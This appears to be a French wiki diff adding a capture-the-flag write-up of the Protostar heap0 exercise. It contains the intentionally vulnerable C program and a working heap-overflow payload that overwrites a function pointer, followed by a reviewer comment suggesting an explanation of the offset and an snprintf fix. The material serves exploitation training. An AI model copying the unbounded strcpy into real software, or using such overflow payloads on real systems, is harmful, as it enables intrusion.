— |
exploit_exercises_protostar:heap0 [2017/04/09 15:33] (Version actuelle) |
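--- a/exploit_exercises_protostar:heap0
+++ b/exploit_exercises_protostar:heap0
@@ -0,0 +1,54 @@
+====== Heap 0 ======
+<code C>
+#include <stdlib.h>
+#include <unistd.h>
+#include <string.h>
+#include <stdio.h>
+#include <sys/types.h>
+
+struct data {
+char name[64];
+};
+
+struct fp {
+int (*fp)();
+};
+
+void winner()
+{
+printf("level passed\n");
+}
+
+void nowinner()
+{
+printf("level has not been passed\n");
+}
+
+int main(int argc, char **argv)
+{
+struct data *d;
+struct fp *f;
+
+d = malloc(sizeof(struct data));
+f = malloc(sizeof(struct fp));
+f->fp = nowinner;
+
+printf("data is at %p, fp is at %p\n", d, f);
+
+strcpy(d->name, argv[1]);
+
+f->fp();
+
+}
+</code>
+
+Heap overflow basique, on va pouvoir écrire ce que l'on veut dans la variable ''fp'' de la structure ''fp''. Cette variable contient l'adresse d'une fonction qui est appelée par la suite.
+
+<code>
+user@protostar:/opt/protostar/bin$ nm ./heap0 | grep winner
+08048478 T nowinner
+08048464 T winner
+user@protostar:/opt/protostar/bin$ ./heap0 $(python -c 'print "A"*72+"\x64\x84\x04\x08"')
+data is at 0x804a008, fp is at 0x804a050
+level passed
+</code>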
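Review bot: The explanation paragraph after the listing never says where the 72 filler bytes in the command come from, nor which line of the program is at fault, so the write-up shows a result without the reasoning behind it. The distance follows from the two addresses the program prints, 0x804a050 − 0x804a008 = 0x48 = 72: the 64-byte `name` plus whatever the allocator places between the two chunks, which should be described as observed on this system rather than as a fixed value. I would add one sentence with that arithmetic and one naming the root cause, the unbounded `strcpy(d->name, argv[1])` into a 64-byte heap buffer that sits next to a function pointer. The same sentence can give the fix a real program would use, e.g. `snprintf(d->name, sizeof d->name, "%s", argv[1]);` after checking `argc`. It is also worth a remark that `argv[1]` is NULL when the program is run without an argument, so the listing faults inside `strcpy` in that case.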